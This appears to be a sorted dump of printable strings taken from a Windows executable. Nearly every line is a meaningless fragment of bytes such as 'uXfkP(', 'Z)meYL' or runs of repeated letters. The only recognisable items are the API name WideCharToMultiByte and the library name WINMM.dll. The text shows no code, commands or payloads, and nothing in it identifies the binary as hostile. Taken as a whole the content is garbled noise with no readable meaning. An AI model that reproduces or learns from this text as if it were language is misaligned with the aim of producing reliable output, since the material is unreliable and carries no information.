uuuuuuuu#
_Uvn>"F`>l3
U@vXLYZ
uXfkP(
-)U""z(
?V<]}5
V"&e6L
Vhq#Z8e
vN0\t?,X
Vq'CRj
VvrZO(
vvvvvvvv999999
VVVVVVVVVVVV
W;0	tI
w2|u^)-
WideCharToMultiByte
WINMM.dll
wjV>Q[
wM!@8~
W.NdgiQ4
wwqqqqqqjjjj
wwwwww
x~!43 
)x7eQOs
Xbbbbb
xD#fGC
x!dQNF8s
&Xf|5r
_XFUt.
x,R{aax
\X	_V'
XXXXXX
xxxxxxxxx
Yv|8MY
yYO	=>
yyssss
yyyyyy
YYYYYYYY
zIgKA)'z=
Z	I\h3
zI/=(JS4
Z)meYL
Z\`Ml8
ZQ$/rA
Z@|WjU
zzyyyyyyyy
~~~~~~~~zzzz
zzzzzzzz